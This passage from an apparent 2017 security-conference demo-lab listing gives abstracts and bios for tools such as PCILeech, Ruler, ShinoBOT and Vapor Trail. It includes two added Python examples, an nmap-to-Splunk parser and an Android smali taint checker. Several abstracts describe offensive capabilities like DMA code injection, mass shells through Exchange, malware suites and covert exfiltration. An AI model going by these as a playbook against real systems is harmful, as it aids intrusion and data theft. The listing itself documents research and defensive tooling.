GoFetch is a tool that automatically executes an attack plan generated by the BloodHound application. It first loads a path of local admin users and computers produced by BloodHound and converts it into its own attack plan format. Once the plan is ready, it advances towards the destination step by step, successively applying remote code execution techniques and compromising credentials with Invoke-Mimikatz, Mimikatz and Invoke-Psexec.

A video of the Python version was published here: https://www.youtube.com/watch?v=dPsLVE0R1Tg A video of Invoke-GoFetch will be published soon. BloodHound Application - https://github.com/BloodHoundAD/BloodHound

Tal Maor
Tal Maor is a Security Researcher at Microsoft who has a passion for creating tools that make life easier and more secure. Prior to Microsoft, Tal developed intelligence platforms at a leading company, and before that served in an IDF intelligence unit for four years. Tal holds a B.Sc. degree in Computer Science.




GreatFET

Dominic Spill

Michael Ossmann

Saturday from 1200-1350 at Table Three

Audience: Hardware & Offense

GreatFET is an open source hardware hacking platform. In addition to support for common protocols such as SPI, USB, JTAG and UART, GreatFET also allows us to implement arbitrary protocols, drive GPIO and act as a logic analyser. Add-on boards, known as neighbors, build on the flexibility of GreatFET and let us rapidly create new tools. Example neighbors include radio platforms, software defined infrared transceivers, and interfaces for hardware hacking.

Hardware: https://github.com/greatscottgadgets/greatfet Software/firmware: https://github.com/dominicgs/GreatFET-experimental

Dominic Spill
Dominic is a senior security researcher at Great Scott Gadgets, where he builds open source tools for reverse engineering communication protocols.

Michael Ossmann
Michael is a wireless security researcher who makes hardware for hackers. He founded Great Scott Gadgets in an effort to put exciting, new tools into the hands of innovative people.




Gumbler

Willis Vandevanter

Sunday from 1200-1350 at Table Two

Audience: Offense, AppSec

The tool searches the entire commit history of a Git project for secrets and files. This is a different approach from other tools, which focus on the current revision. It is excellent at digging up API keys, deleted usernames and passwords, or files that were committed before being hidden by .gitignore.

https://github.com/BuffaloWill/gumbler

Willis Vandevanter
Willis Vandevanter is a principal at Silent Robot Systems. Prior to SRS, Will was a Senior Researcher at Onapsis and Lead Penetration Tester at Rapid7. He has previously spoken at Blackhat, DEFCON, TROOPERS, and other conferences. In his spare time, he writes code and contributes to different projects.




HI-Jack-2Factor

Weston Hecker

Sunday from 1000-1150 at Table Six

Audience: Offense, Defense, Hardware

There are several attacks being performed on PKES (passive keyless entry and start) systems in cars. Several high-profile talks this year cover stealing cars with $11 SDRs and cheap devices that relay the signals between the key fob and the immobilizer. I will be demoing a device I made using an Arduino, a 433/315 MHz radio and a 2.4 GHz wireless antenna. It costs about 12 dollars to build and essentially adds two-factor authentication to your vehicle.

The original relay-attack research (IACR ePrint 2010/332): https://eprint.iacr.org/2010/332.pdf. The modern 2017 version: https://www.wired.com/2017/04/just-pair-11-radio-gadgets-can-steal-car/

Weston Hecker




LAMMA 1.0

Antriksh Shah

Ajit Hatti

Saturday from 1200-1350 at Table One

Audience: Cryptologists, cryptanalysts, developers and testers, blockchain and PKI implementers.

Last year we released LAMMA Beta at DEF CON; this year we are bringing the updated version of LAMMA with new modules for blockchain security testing, auditing trust stores, enhanced checks for source code analysis and logical flaws in crypto coding. LAMMA 1.0, with new features and fixes, makes crypto testing more effective and smoother even for large scale implementations. You can use and enhance LAMMA 1.0, as it is free and open source.

http://www.securitymonx.com/products/lamma

Antriksh Shah
Antriksh is a security researcher from Goa. He is associated with the null Open Security Community and organizes Nullcon. His areas of interest are VAPT, web app security, network auditing and forensics. Currently his research is focused on security issues in blockchain implementations, and he has contributed his work to enhance LAMMA.

Ajit Hatti
Ajit Hatti has been contributing to the secure usage of cryptography for the past 5 years and is currently focusing on the security issues of blockchain-related technologies. He is the author of the LAMMA and GibberSense tools, which help in securing crypto and PKI implementations.

Ajit is founder of SecurityMonx and is also working in collaboration with Payatu on futuristic projects. He also co-founded the null Open Security Community and has worked with Symantec, Emerson, Zscaler, IBM and Bluelane as a Security Researcher.

Ajit has presented his work at Black Hat, DEF CON and the Crypto & Privacy Village, and organizes Nullcon in India. He loves to run, volunteers at BSides LV and organizes The World Run by Hackers.




Leviathan Framework

Utku Sen

Ozge Barbaros

Sunday from 1000-1150 at Table Four

Audience: Red teamers, penetration testers (Offensive)

Leviathan is a mass audit toolkit with wide-range service discovery, brute force, SQL injection detection and custom exploit capabilities. It is built from open source tools such as masscan, ncrack and DSSS and gives you the flexibility of using them in combination.

The main goal of the project is to audit as many systems as possible across a country-wide or otherwise very wide IP range.

Github page: https://github.com/leviathan-framework/leviathan A blog post about its custom exploit feature: https://www.utkusen.com/blog/wide-range-detection-of-doublepulsar-implants-with-leviathan.html

Utku Sen
Utku Sen is a security engineer working for Sony. He is the author of the ransomware honeypot projects Hidden Tear and EDA2, which were featured in Forbes and Business Insider. Utku mostly focuses on the following areas: web application security, network security, tool development and bug hunting. He was also nominated for a Pwnie Award in the "Best Backdoor" category in 2016.

Ozge Barbaros
Ozge Barbaros is a security tools senior developer at Sony. Previously, she worked as GNU/Linux system administrator and as software developer at several companies in Turkey and studied Computer Engineering at Canakkale Onsekiz Mart University. She is interested in developing free software technologies.




Maltego "Have I been pwned?"

Christian Heinrich

Saturday from 1000-1150 at Table Five

Audience: Defense

"Have I been pwned?" allows you to search across multiple data breaches to see whether your email addresses or aliases appear in breaches such as LinkedIn, Tumblr, etc.

Maltego is a link analysis application of technical infrastructure and/or social media networks from disparate sources of Open Source INTelligence (OSINT). Maltego is listed on the Top 10 Security Tools for Kali Linux by Network World and Top 125 Network Security Tools by the Nmap Project.

The integration of "Have I been pwned?" with Maltego visualises these breaches in an easy to understand graph format that can be enriched with other sources.

https://github.com/cmlh/Maltego-haveibeenpwned

Christian Heinrich
Christian Heinrich has presented at the OWASP Conferences in Australia, Europe and USA and OWASP Chapters in the Netherlands, London and Sydney and Melbourne, Australia, ToorCon (USA), Shmoocon (USA), BlackHat (Asia and USA), SecTor (Canada), CONFidence (Europe), Hack In The Box (Europe), SyScan (Singapore), B-Sides (Australia), RUXCON (Australia), and AusCERT (Australia).




Mycroft

Joshua Montgomery

Saturday from 1400-1550 at Table One

Audience: Hardware, IoT, Automotive, AI, Everyone

Mycroft is an open source virtual assistant similar to Siri or Amazon Alexa. The technology stack allows developers to include a voice interface in anything from a Raspberry Pi to a Jaguar F-TYPE sports car.

Mycroft integrates Speech-To-Text, Natural Language Processing, a Skill Framework and a Text-To-Speech engine into a single, easy to deploy software stack.

Though the technology runs anywhere, the company has developed a Raspberry Pi image (Pi-Croft) and recently deployed a Gnome Shell extension. The company also has a hardware device, the "Mark I", that comes pre-loaded with the software and includes a variety of I/O options for directly controlling devices.

http://mycroft.ai/

Joshua Montgomery
Mycroft is a team effort, but the presenter is likely to be Joshua Montgomery. Joshua is a three-time entrepreneur and Air Force officer. A graduate of the University of Kansas, Joshua founded Wicked Broadband, a gigabit fiber-to-the-home ISP in Lawrence, KS. As the owner of an ISP Joshua has been an advocate for shared networks, common carriage and net neutrality. He has been featured in Wired, Forbes and Ars Technica and has been instrumental in advocating for municipal broadband in his home state of Kansas.

Joshua started the Mycroft project because he wanted to deploy the Star Trek computer in his makerspace. He recruited a talented team of developers, ran a highly successful Kickstarter, was invited to join Techstars in 2016 and is an alum of 500 Startups.

In his capacity as an Air Force officer Joshua serves with the 177 IAS out of Wichita, Kansas. His unit is responsible for providing threat replication for the Department of Defense.




PCILeech

Ulf Frisk

Sunday from 1200-1350 at Table Three

Total physical pwnage and plenty of live demos in this action packed Demo Lab! The PCILeech direct memory access attack toolkit was presented at DEF CON 24 and quickly became popular amongst red teamers and governments alike. A year later major operating systems are still vulnerable by default. I will demonstrate how to take total control of Linux, Windows and macOS by PCIe DMA code injection. Kernels will be subverted, full disk encryption defeated, file systems mounted and shells spawned! All this by using affordable hardware and the open source PCILeech toolkit.

http://github.com/ufrisk/pcileech

Ulf Frisk
Ulf Frisk is a hacker/penetration tester working in the Swedish financial sector. Ulf focuses mainly on online banking security, penetration testing and IT security audits during the daytime and low-level coding at night. Ulf has been working professionally with security since 2011 and has a dark past as a developer.




PIV OPACITY

Christopher Williams

Saturday from 1000-1150 at Table Six

Audience: Authentication, Mobile, Embedded Security, Biohacking

OPACITY is a fast, lightweight authenticated key-agreement protocol built on elliptic-curve Diffie-Hellman, adopted as an open standard by NIST, ANSI and GlobalPlatform. Originally designed for payment and identity applications, OPACITY provides a method for securing the NFC channel of low power devices with embedded secure hardware, such as smart cards. I will show an Android demonstration leveraging this open standard, as defined in NIST SP 800-73-4, to securely produce derived credentials and provide flexible and private authentication. While this demo is designed to showcase the Federal PIV standard, the OPACITY algorithm and concepts are broadly applicable to providing secure transactions in IoT, biohacking and other low power embedded systems.

https://youtu.be/ftn8-Cth554

Christopher Williams
Dr. Christopher Williams specializes in the implementation and evaluation of information assurance and data collection techniques to solve emerging problems around transaction security and privacy in IoT, fintech, and transportation. Dr. Williams has a Ph.D. in Physics from University of Chicago, where his dissertation research focused on design, prototyping, and field deployment of novel detectors for particle astrophysics. He has diverse scientific experience with expertise in systems integration, instrumentation, experimental design, and real-time data acquisition with a focus on systematic error mitigation. He has applied his expertise to validate standards compliance in secure messaging protocols between a smart card and host; and to study the integration of commercial cryptography solutions into a government approved authentication infrastructure for mobile platforms.




probespy

stumblebot

Sunday from 1000-1150 at Table One

Audience: offense/recon/surveillance

Probespy is a dumb and dirty tool for analyzing directed and broadcast probe request data sent by wifi client devices. It assists in locating where wireless client devices have been (geolocation) and creating behavioral profiles of the person(s) owning the device via the identification of known SSIDs.

https://github.com/stumblebot/probespy

stumblebot
Stumblebot uses computers a lot. Currently he is paid to use computers on behalf of CDW's infosec team.




Radare2

Maxime Morin

Saturday from 1400-1550 at Table Six

Audience: Many people currently use radare2 for a wide range of purposes: binary exploitation, reversing of unusual CPU architectures, binary diffing, CTFs and emulation. We also try to attract new contributors to the project and invite students to collaborate through platforms such as Google Summer of Code or the Radare Summer of Code, which we try to organize based on donations.

Radare2 is an open-source Reverse-Engineering Framework

> Project URL: http://radare.org/r/
> Git Project URL: https://github.com/radare/radare2

Maxime Morin
French IT Security Consultant living in Amsterdam, I work for FireEye in the i3 team, performing general technical threat analysis (malware analysis, etc.). I'm interested in reverse engineering, especially malware-related analysis. I am a modest contributor to the project and part of the core group; I mainly work on the regression-test suite and am mentoring a student for Google Summer of Code for the project this year. I have already done a workshop at BSidesLV and at other conferences with other contributors, for example at hack.lu, as well as "unofficial" workshops in Vegas bars/restaurants. I also rewrote the radare book, which is a quick intro to radare2.

Back to top



Ruler - Pivoting Through Exchange

Etienne Stalmans

Saturday from 1200-1350 at Table Four

Microsoft Exchange has become the de facto gateway into most organisations. By nature, Exchange needs to be externally accessible, and usually falls outside of normal security monitoring. This can allow for the bypass of common security mechanisms. Even when organisations move into the cloud, their Exchange servers still provide access into the internal environment. It has been shown in the past that abusing the rules feature of Outlook, combined with auto-synchronisation through Exchange, can allow for remote code execution.

Furthermore, Exchange offers a covert communication channel outside of the usual HTTP or TCP employed by most malware. Using the mailbox itself, it is possible to create a communication channel that doesn't traverse the normal network boundary, and appears to be normal Exchange behaviour when inspected on the wire.

Introducing Ruler:

During our Red Team assessments, we saw an opportunity to utilise inherent weaknesses of Microsoft Exchange and create a fully-automated tool that aided further breach of the network. Ruler allows for the easier abuse of built-in functionality, including the ability to execute code on every mailbox connected to the Exchange server.

This talk will showcase the numerous features of Ruler, demonstrating how to gain a foothold, pop shells on every connected mailbox, use Exchange as a covert communication channel and maintain a near invisible persistence in the organisation. We will also discuss possible defenses against the demonstrated attacks.

https://github.com/sensepost/ruler

Etienne Stalmans

Back to top



SamyKam

Salvador Mendoza

Saturday from 1200-1350 at Table Five

Audience: Offense/Defense/Hardware

SamyKam is a new project to pentest mag-stripe information, designed using Samy Kamkar's MagSpoof as a base but in this case for Raspberry Pi integration. SamyKam is portable hardware which the user can interact with directly over SSH, an OLED display, a phone or a browser to test magnetic card readers or tokenization processes with prepared attacks.

https://salmg.net/2017/01/16/samykam/

Salvador Mendoza
Salvador Mendoza is a security researcher focusing on tokenization processes, mag-stripe information and embedded prototypes. He has presented on tokenization flaws and payment methods at Black Hat USA, DEF CON, DerbyCon, Ekoparty, BugCON and Troopers. Salvador has designed different tools to pentest mag-stripe and tokenization processes. His toolset includes MagSpoofPI, JamSpay, TokenGet and lately SamyKam.

Back to top



ShinoBOT Family

Sh1n0g1

Saturday 1600-1750 and Sunday 1200-1350 at Table Six/Five

Audience: Offense

ShinoBOT Family is a malware suite for pentesters and security engineers who want to test a vendor's solution. It contains a backdoor, ransomware, a downloader, a dropper, PowerShell-based malware, obfuscation/encryption techniques and a pseudo-DGA, and the C&C is provided as a service (C&CaaS) at no fee. 5 seconds to get ready: "DOWNLOAD. EXECUTE. CONTROL."

https://shinobot.com/ (ShinoBOT executable)
https://shinobotps1.com/ (PowerShell edition)
https://shinolocker.com/ (ShinoLocker)
https://shinosec.com/ (other components, including ShinoBOT Suite)

Sh1n0g1
Security Researcher (a.k.a. Hacker). 12 years of breaking security solutions.

Back to top



Advanced Spectrum Monitoring with ShinySDR

Michael Ossmann

Dominic Spill

Saturday from 1600-1750 at Table One

Audience: Wireless, Defense

We have developed open source tools to monitor the RF spectrum at a high level and then drill down to individual signals, supporting both reverse engineering and signals intelligence. By automatically combining the results with OSINT data from regulatory bodies around the world, we are able to build up a picture of devices transmitting in an environment.

http://greatscottgadgets.com/spectrummonitoring

Michael Ossmann
Michael Ossmann is a wireless security researcher who makes hardware for hackers. Best known for the open source HackRF, Ubertooth, and GreatFET projects, he founded Great Scott Gadgets in an effort to put exciting, new tools into the hands of innovative people.

Dominic Spill
Dominic Spill is senior security researcher for Great Scott Gadgets. The US government recently labelled him as "extraordinary." This has gone to his head.

Back to top



Splunking Dark Tools - A Pentesters Guide to Pwnage Visualization

Bryce Kunz @TweekFawkes

Nathan Bates (@Brutes_)

Saturday from 1200-1350 at Table Six

During a penetration test, we typically collect all sorts of information into flat files (e.g. nmap scans, masscan, recon-ng, hydra, dirb, nikto, etc.) and then manually analyze those outputs to find vectors into target networks. Leveraging data analytics techniques within Splunk, pentesters will be able to quickly find the information they are looking for and hence exploit more target networks within short time periods. This talk covers the required tools for consolidating, analyzing and visualizing the dark tools that are used by every red team. We'll release the required framework for getting the data where it needs to be, the technical add-ons to ensure this data is ingested in usable formats, and dashboards for Splunk to leverage this data for mass pwnage of your target!
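The first step the abstract describes, getting tool output out of flat files and into a format Splunk ingests as usable fields, is the part worth seeing in code. The example below is added here and is not the speakers' framework or add-on: it parses nmap's grepable (-oG) format into one flat JSON event per host status and per port, the shape a Splunk file monitor can index with automatic field extraction. The scan output is constructed for the example (hypothetical addresses and hostnames); the `scan_id` field is an assumption about how you would later join events from one engagement.

```python
import json
import re

# One nmap -oG record line holds tab-separated "Key: value" fields.
# A port entry looks like  port/state/proto/owner/service/rpc_info/version/
# and nmap writes any "/" inside a version string as "|".
PORT_FIELDS = ("port", "state", "proto", "owner", "service", "rpc_info", "version")
HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\(([^)]*)\)")


def _fields(line: str) -> dict:
    """Split a grepable record into its tab-separated Key: value pairs."""
    out = {}
    for chunk in line.rstrip("\n").split("\t"):
        key, sep, value = chunk.partition(": ")
        if sep:
            out[key.strip()] = value.strip()
    return out


def parse_grepable(text: str, scan_id: str = "constructed-scan") -> list:
    """Turn nmap grepable output into flat JSON-ready events: one 'host' event per
    Host/Status line and one 'port' event per port entry. Comment lines are skipped."""
    events = []
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue                      # "# Nmap ..." header and footer lines
        m = HOST_RE.match(line)
        if not m:
            continue
        ip, hostname = m.group(1), m.group(2) or None
        f = _fields(line)
        if "Status" in f:
            events.append({"scan_id": scan_id, "event_type": "host",
                           "ip": ip, "hostname": hostname, "status": f["Status"]})
        if "Ports" in f:
            # Split on ", " only where the next "port/" entry starts: version
            # strings can themselves contain commas.
            for entry in re.split(r",\s+(?=\d+/)", f["Ports"]):
                parts = entry.strip().rstrip("/").split("/")
                # rstrip dropped the trailing slash, so entries with an empty
                # version need padding back to seven fields
                parts += [""] * (len(PORT_FIELDS) - len(parts))
                rec = dict(zip(PORT_FIELDS, parts))
                rec["port"] = int(rec["port"])
                rec["version"] = rec["version"].replace("|", "/") or None
                events.append({"scan_id": scan_id, "event_type": "port",
                               "ip": ip, "hostname": hostname, **rec})
    return events


def to_json_lines(events: list) -> str:
    """One JSON object per line, the form a Splunk file monitor indexes directly."""
    return "\n".join(json.dumps(e, sort_keys=True) for e in events)


# Constructed sample of nmap -sV -oG output (not a real scan).
SAMPLE_GREPABLE = """\
# Nmap 7.40 scan initiated Sat Jul 29 10:00:00 2017 as: nmap -sV -oG - 10.0.0.0/30
Host: 10.0.0.1 (gw.example.test)\tStatus: Up
Host: 10.0.0.1 (gw.example.test)\tPorts: 22/open/tcp//ssh//OpenSSH 7.4 (protocol 2.0)/, 80/open/tcp//http//nginx 1.12.2/, 443/filtered/tcp//https///\tIgnored State: closed (997)
Host: 10.0.0.2 ()\tStatus: Down
# Nmap done at Sat Jul 29 10:00:05 2017 -- 4 IP addresses (1 host up) scanned in 5.00 seconds
"""

if __name__ == "__main__":
    print(to_json_lines(parse_grepable(SAMPLE_GREPABLE)))
```

Writing the events as JSON lines means Splunk's KV_MODE=json extraction yields `ip`, `port`, `service` and `version` as searchable fields without a custom props.conf regex; a masscan or nikto parser emitting the same keys can then share the same dashboards.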

Bryce Kunz @TweekFawkes
Bryce Kunz (@TweekFawkes) applies his knowledge of the red side to discover vulnerabilities which enable exploiting all the things! He currently leads the tailored testing of Adobe's marketing cloud infrastructure to discover security vulnerabilities. An ex-NSA, ex-DHS employee who holds various certifications (OSCP, CISSP, etc.), his fervor for perfection drives him to share intriguing research.

Nathan Bates (@Brutes_)
Nathan Bates (@Brutes_) applies his knowledge of the blue side to defend against organized crime, nation-states and Bryce. He currently leads the security-centric big data initiatives for Adobe's marketing cloud infrastructure, building large-scale systems for security monitoring and incident response.

Back to top



Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes

Takahiro Yoshimura (alterakey)

Ken-ya Yoshimura (ad3liae)

Sunday from 1000-1150 at Table Two

Audience: AppSec, Mobile

Trueseeing is an automatic vulnerability scanner for Android apps. It is capable not only of directly conducting data flow analysis over Dalvik bytecode but also of automatically fixing the code, i.e. without any decompilers. This capability makes it resilient against basic obfuscations and distinguishes it among similar tools, including QARK, the scanner/exploitation tool shown by LinkedIn at DEF CON 23. Currently it recognizes most classes of vulnerabilities (as in the OWASP Mobile Top 10 (2015)).
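To make the "data flow analysis over Dalvik bytecode, without a decompiler" idea concrete, here is an added example of register-level taint propagation over smali, the textual form of Dalvik opcodes. It is my illustration, not Trueseeing's code or its rule set: the source/sink lists are a minimal constructed policy (the Android methods named are real APIs), the smali fragments are constructed, and the analysis assumes straight-line code in one basic block, non-range `invoke-*` forms and no tracking of taint through fields.

```python
import re

# Taint sources (attacker-controlled input) and sinks. Constructed minimal
# policy; the Android methods are real, the selection is the example's own.
SOURCES = {
    "Landroid/content/Intent;->getStringExtra",
    "Landroid/content/Intent;->getDataString",
}
SINKS = {
    "Landroid/webkit/WebView;->loadUrl": "WebView.loadUrl with attacker-controlled URL",
    "Ljava/lang/Runtime;->exec": "Runtime.exec with attacker-controlled command",
}

# invoke-kind {regs}, Lclass;->method(   (range forms like invoke-virtual/range
# are deliberately not matched and are skipped by this example)
INVOKE_RE = re.compile(r"^(invoke-\w+)\s+\{([^}]*)\},\s+(L[^;]+;)->(\w+|<init>)\(")
TWO_REG_RE = re.compile(r"^(\S+)\s+([vp]\d+),\s+([vp]\d+)")


def find_taint_flows(smali: str) -> list:
    """Forward taint propagation over straight-line smali. Returns a list of
    (line_no, description) for every sink call fed by a tainted register."""
    tainted = set()
    pending = False          # does the most recent invoke's return value carry taint?
    findings = []
    for line_no, raw in enumerate(smali.splitlines(), 1):
        ins = raw.strip()
        if not ins or ins.startswith(("#", ".", ":")):
            continue                       # comments, directives, labels
        m = INVOKE_RE.match(ins)
        if m:
            kind, regs, cls, name = m.groups()
            regs = [r.strip() for r in regs.split(",") if r.strip()]
            # virtual/direct/interface/super calls pass 'this' first; it is not data
            args = regs[1:] if kind != "invoke-static" and regs else regs
            key = f"{cls}->{name}"
            if key in SOURCES:
                pending = True
            elif key in SINKS:
                if any(r in tainted for r in args):
                    findings.append((line_no, SINKS[key]))
                pending = False
            else:
                # unknown method: conservatively assume its result is tainted
                # whenever any argument was
                pending = any(r in tainted for r in args)
            continue
        op = ins.split()[0]
        if op.startswith("move-result"):
            dst = ins.split()[1]
            if pending:
                tainted.add(dst)
            else:
                tainted.discard(dst)
            pending = False
        elif op.startswith("move"):
            m2 = TWO_REG_RE.match(ins)
            if m2:                         # move/move-object/move-wide vA, vB
                dst, src = m2.group(2), m2.group(3)
                if src in tainted:
                    tainted.add(dst)
                else:
                    tainted.discard(dst)
        elif op.startswith(("const", "iget", "sget", "new-instance")):
            # literal or field read: treated as clean (fields are not tracked here)
            tainted.discard(ins.split()[1].rstrip(","))
    return findings


# Constructed smali fragment (not from a real app): the "url" extra of the
# launching Intent flows straight into WebView.loadUrl.
VULNERABLE = """
    invoke-virtual {p0}, Lcom/example/MainActivity;->getIntent()Landroid/content/Intent;
    move-result-object v0
    const-string v1, "url"
    invoke-virtual {v0, v1}, Landroid/content/Intent;->getStringExtra(Ljava/lang/String;)Ljava/lang/String;
    move-result-object v2
    move-object v3, v2
    iget-object v4, p0, Lcom/example/MainActivity;->webView:Landroid/webkit/WebView;
    invoke-virtual {v4, v3}, Landroid/webkit/WebView;->loadUrl(Ljava/lang/String;)V
"""

# Same sink, but the URL is a compile-time constant: no source reaches it.
SAFE = """
    const-string v3, "https://example.test/help"
    iget-object v4, p0, Lcom/example/MainActivity;->webView:Landroid/webkit/WebView;
    invoke-virtual {v4, v3}, Landroid/webkit/WebView;->loadUrl(Ljava/lang/String;)V
"""

if __name__ == "__main__":
    for line_no, what in find_taint_flows(VULNERABLE):
        print(f"line {line_no}: {what}")
```

Because the analysis works on registers and method descriptors rather than on reconstructed Java, renaming classes or methods in the app's own code (the `Lcom/example/...` names above) does not affect it; only the framework API names matter, and those cannot be obfuscated. A real tool also has to handle branches (a fixed-point over the control-flow graph), range invokes and field-carried taint.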

https://github.com/taky/trueseeing

Takahiro Yoshimura (alterakey)
TAKAHIRO YOSHIMURA: He is Chief Technology Officer at Monolith Works Inc. In the 2012 METI-coordinated CTF, Challenge CTF Japan 2012, his team (Enemy10) won the local qualification round in first place. In 2013, his team (Sutegoma2) took 6th place in the DEF CON 21 CTF. He likes to read binaries and hack things. He loves a GSD.

Ken-ya Yoshimura (ad3liae)
KEN-YA YOSHIMURA: Working as Chief Executive Officer at Monolith Works Inc, he supervises an R&D lab specializing in emerging technologies. His hacker life started when he was 8 years old; he likes to hack MSXs, NEC PC-9800s, Sharp X68000s, Windows, Macs, iPhones, iOS/Android apps, and to circumvent copyright protection (for fun), etc. He adores a GSD.

Back to top



Universal Serial aBUSe

Rogan Dawes

Saturday from 1600-1750 at Table Four

Audience: This tool is aimed at Offensive folks, with an interest in hardware attacks.

Universal Serial aBUSe is a combination of hardware and software, and is a refinement of the old school USB HID attacks. It adds a WiFi interface to the USB device, which enables the attacker to remotely trigger the payload at a time of their choosing, not just after a fixed delay from the time it is plugged in. The WiFi interface also enables a back-channel to allow the typed payload to communicate with the attacker without touching the victim's network interfaces.

This enables the attacker to avoid any network complexity (air gaps, firewalls and proxies) or network-based monitoring, and still obtain that precious shell!

https://sensepost.com/blog/2016/universal-serial-abuse/
https://github.com/SensePost/USaBUSe

Rogan Dawes
Rogan Dawes is a senior researcher at SensePost and has been hacking since 1998, which, coincidentally, is also the time he settled on a final wardrobe. He used the time he saved on choosing outfits to live up to his colleague’s frequent joke that he has an offline copy of the Internet in his head. Rogan spent many years building web application assessment tools, and is credited as having built one of the first and most widely used intercepting proxies; WebScarab. In recent years, Rogan has turned his attentions towards hardware hacking; and these days many suspect him to be at least part cyborg. A good conversation starter is to ask him where he keeps his JTAG header.

Back to top



Vapor Trail

Galen Alderson

Larry Pesce

Sunday from 1200-1350 at Table Six

Audience: Offense, Defense, Hardware

As red team members and even "evil attackers", we've been finding numerous ways to exfiltrate data from networks with inexpensive hardware: Ethernet, WiFi and cellular (2G, 3G and LTE). The first two are highly detectable, while the latter is expensive and both leave a paper trail. We found a way to use a medium that is right under everypony's nose; low power, broadcast FM radio. With a Raspberry Pi and a length of wire, we can send text and raw binary data with a method nopony (until now) would think to look for. We receive the data with an RTL-SDR, putting our overall hardware budget at $20. In this demo, we will show you how to build and use this system. We'll share tales of the custom software and transmission protocols. You want to see it in action? We've got demos. You want the software? Yep, you can have that too. We're excited to offer Vapor Trail to you, the first FM radio data exfiltration tool. Sure, HAM radio folks have had digital modes for years, but we've done better AND cheaper. We've effectively created our own RF digital mode for pwnage, HAM radio data transfer and redundant communication methods. Why? Because we can. We want to go undetected with current capabilities. Turns out, our approach is quite novel for pulling data right from a network via pcaps or tool output.

http://vaportrail.io/

Galen Alderson
This is Galen Alderson's first conference submission, but not his first contribution to the security industry. Fresh out of high school, Galen still has the new car smell. Galen has many years to become a curmudgeon by getting broken in as an intern at InGuardians.

Larry Pesce
Larry Pesce on the other hand, is almost veteran enough to be a curmudgeon. He has a few more years to go before yelling about kids on his lawn and no-code Extra Class Amateur radio operators. In the meantime, he keeps himself occupied as the Director of Research at InGuardians.

Back to top



WIDY 2.0: WIFI 0WNAGE IN UNDER $5 RELOADED

Vivek Ramachandran

Nishant Sharma

Ashish Bhangale

Sunday from 1000-1150 at Table Five

Audience: Attack and Defense

WiDy is an open source Wi-Fi attack and defense platform created to run on the extremely cheap ESP8266 (<$5) IoT platform. We've written a simple framework which you can hack to create your own tools or automate attack/defense tasks. We also provide code to bring the concept of deception to the WiFi area. WiDy was launched at the Black Hat Asia 2017 Arsenal and received a good response from the audience. The WiDy 2.0 release contains several major improvements over the initial version.

Vivek Ramachandran
Vivek Ramachandran is the Founder and Chief Trainer at Pentester Academy. He discovered the Caffe Latte attack, broke WEP Cloaking (a WEP protection scheme), conceptualized enterprise Wi-Fi Backdoors and created Chellam, the world's first Wi-Fi Firewall. He is also the author of multiple five-star-rated books which have together sold over 13,000 copies worldwide and have been translated into multiple languages. Vivek started SecurityTube.net in 2007, a YouTube for security which currently aggregates the largest collection of security research videos on the web. SecurityTube Training and Pentester Academy now serve thousands of customers from over 90 countries worldwide. He also conducts in-person trainings in the US, Europe and Asia. Vivek's work on wireless security has been quoted in BBC Online, InfoWorld, MacWorld, The Register, IT World Canada and other places. He has spoken/trained at top conferences around the world including Black Hat USA, Europe and Abu Dhabi, DEF CON, Hacktivity, BruCON, SecurityByte, SecurityZone, Nullcon, c0c0n etc. Vivek has over a decade of experience in security and has a keen interest in the areas of wireless, mobile, network and web application pentesting, shellcoding, reversing and exploit research. He loves programming in Python, C and Assembly.

Nishant Sharma
Nishant Sharma is a researcher and course creator at Pentester Academy, prior to which he was a core firmware developer at Mojo Networks (previously known as AirTight Networks). He presented WiDy (Under $5 WiFi Hacker Gadget) at the Black Hat Asia Arsenal 2017. He has contributed to multiple projects like the Vulnerable Router Project and Damn Vulnerable WordPress. He has also contributed to the "Pentest Gadget book" authored by Mr. Vivek Ramachandran. He has a Master's degree in Information Security from IIIT Delhi. Nishant has also published peer-reviewed academic research on HMAC security. His areas of interest include WiFi and IoT security, AD security, forensics and cryptography.

Ashish Bhangale
Ashish Bhangale is a Sr. Security Researcher at Pentester Academy. He has 5+ years of experience in network and web application security. He has previously worked with various law enforcement agencies as a Digital Forensics Investigator. He was responsible for developing and testing the Chigula and Chellam frameworks. He has also created and managed multiple projects like the Command Injection & Arbitrary File Upload Vulnerable Web Application OS (a collection of vulnerable OSes) and Damn Vulnerable WordPress. He co-presented WiDy (Under $5 WiFi Hacker Gadget) at the Black Hat Asia Arsenal 2017. His areas of interest include forensics, WiFi and AD security.

Back to top



WiFi Cactus

darkmatter

Saturday 1000-1150 and Sunday 1200-1350 at Table Four

Audience: Offense, Defense

With this project you will be able to listen to all Wi-Fi channels at the same time. No more broken or fragmented frames due to channel hopping. It will passively monitor the dangerous WiFis around you, giving you metadata and actual data that might be useful.

http://palshack.org/

darkmatter
Darkmatter is a mad scientist who likes to hack hardware and software. He is particularly obsessed with wireless.

Back to top



WiMonitor - an OpenWRT package for remote WiFi sniffing

Vivek Ramachandran

Nishant Sharma

Ashish Bhangale

Sunday from 1200-1350 at Table One

Audience: Defense

WiMonitor is a ready-to-use OpenWRT package which allows the user to convert an OpenWRT WiFi router into a remote WiFi sniffer. It modifies the LuCI interface to show the task-specific configuration options. With the right configuration, it then captures WiFi packets using monitor mode (while hopping on the configured channels) and sends them to a remote machine as Aruba ERM (Encapsulated Remote Mirroring) packets. This allows the user to observe, capture and analyze traffic from multiple sources (read: APs turned into sensors) on one machine (laptop/PC) using off-the-shelf OpenWRT-compatible routers.

Vivek Ramachandran
Vivek Ramachandran is the Founder and Chief Trainer at Pentester Academy. He discovered the Caffe Latte attack, broke WEP Cloaking (a WEP protection scheme), conceptualized enterprise Wi-Fi Backdoors and created Chellam, the world's first Wi-Fi Firewall. He is also the author of multiple five-star-rated books which have together sold over 13,000 copies worldwide and have been translated into multiple languages. Vivek started SecurityTube.net in 2007, a YouTube for security which currently aggregates the largest collection of security research videos on the web. SecurityTube Training and Pentester Academy now serve thousands of customers from over 90 countries worldwide. He also conducts in-person trainings in the US, Europe and Asia. Vivek's work on wireless security has been quoted in BBC Online, InfoWorld, MacWorld, The Register, IT World Canada and other places. He has spoken/trained at top conferences around the world including Black Hat USA, Europe and Abu Dhabi, DEF CON, Hacktivity, BruCON, SecurityByte, SecurityZone, Nullcon, c0c0n etc. Vivek has over a decade of experience in security and has a keen interest in the areas of wireless, mobile, network and web application pentesting, shellcoding, reversing and exploit research. He loves programming in Python, C and Assembly.

Nishant Sharma
